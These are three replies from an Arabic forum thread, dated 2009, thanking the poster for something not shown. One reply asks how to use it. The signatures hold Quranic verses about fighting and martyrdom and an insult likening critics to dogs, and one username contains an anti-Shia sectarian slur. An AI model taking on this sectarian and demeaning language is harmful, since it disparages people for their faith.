قديم 09-02-2009, 03:35   #13
:: عضو خبير ::
 
الصورة الرمزية handala007
 
تاريخ التسجيل: Nov 2008
المشاركات: 328
مشكور اخي و جزاك الله الف خير....قَالَ رَسُولُ اللَّهِ صلى الله عليه وسلم ‏
(("‏‏ مَنْ سُئِلَ عَنْ عِلْمٍ فَكَتَمَهُ أَلْجَمَهُ اللَّهُ بِلِجَامٍ مِنْ نَارٍ يَوْمَ الْقِيَامَةِ ‏"‏‏ )).

فَقَاتِلْ فِي سَبِيلِ اللَّهِ لا تُكَلَّفُ إِلا نَفْسَكَ وَحَرِّضِ الْمُؤْمِنِينَ
عَسَى اللَّهُ أَنْ يَكُفَّ بَأْسَ الَّذِينَ كَفَرُوا وَاللَّهُ أَشَدُّ بَأْسًا وَأَشَدُّ تَنْكِيلا

وقوله تعالى :

[ وَلاَ تَحْسَبَنَّ الَّذِينَ قُتِلُواْ فِي سَبِيلِ اللّهِ أَمْوَاتاً بَلْ أَحْيَاء عِندَ رَبِّهِمْ يُرْزَقُونَ{169} فَرِحِينَ بِمَا آتَاهُمُ اللّهُ مِن فَضْلِهِ وَ يَسْتَبْشِرُونَ بِالَّذِينَ لَمْ

يَلْحَقُواْ بِهِم مِّنْ خَلْفِهِمْ أَلاَّ خَوْفٌ عَلَيْهِمْ وَلاَ هُمْ يَحْزَنُونَ{170} يَسْتَبْشِرُونَ بِنِعْمَةٍ مِّنَ اللّهِ وَفَضْلٍ وَأَنَّ اللّهَ لاَ يُضِيعُ أَجْرَ الْمُؤْمِنِينَ{171} ]

سورة آل عمران

( قُلْ إِنَّ صَلَاتِي وَنُسُكِي وَمَحْيَايَ وَمَمَاتِي لِلَّهِ رَبّ الْعَالَمِينَ، لَا شَرِيكَ لَهُ وَبِذَلِكَ أُمِرْتُ وَأَنَا أَوَّلُ الْمُسْلِمِينَ )

صدق الله العضيم
سبحان الله عدد ما كان وعدد ما سيكون وعدد الصمت والسكون
الا ان حزب الله هم الغالبون
لن تركع امة قائدها محمد (ص)

لا تأسف على الزمان لطالما بلت على جتث الاسود كلاب لا قصدها ان تعلوا على اسياديها تبقى الاسود أسود وكلاب كلا تبقى الاسود

مخيفة في اسرها حتى وان نبحت عليها الكلاب

قـُل مآشئـت في مسبتـي فسكُوتي عن آلحقيـرٍ .. جوٍآإب ..
ليس ضعفا مني ولكن مامن اسد يرد على خطب..الكلاب ...
تعلم للمنفعة أو لرد الضرر

مشكور اخي
__________________
handala007 غير متصل   رد مع اقتباس
قديم 09-02-2009, 04:12   #14
:: عضو محترف ::
 
تاريخ التسجيل: Nov 2008
المشاركات: 698
مشكوررررررررررررررر
__________________
//

^^ اكسب الحسنات ^^ ولك الاجر والمثوبه

//

اتحداك ما تبكي شيخ قالها صراحه في مصر والجزائر

http://www.youtube.com/watch?v=YEAZLpc6sDY
قاهر الرافضه غير متصل   رد مع اقتباس
قديم 09-02-2009, 04:23   #15
مطرود
 
الصورة الرمزية يارب صبرني
 
تاريخ التسجيل: Feb 2009
المشاركات: 136
ممكن تشششششششششششرحلنا كيف نستعملها
يارب صبرني غير متصل   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 07:08


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.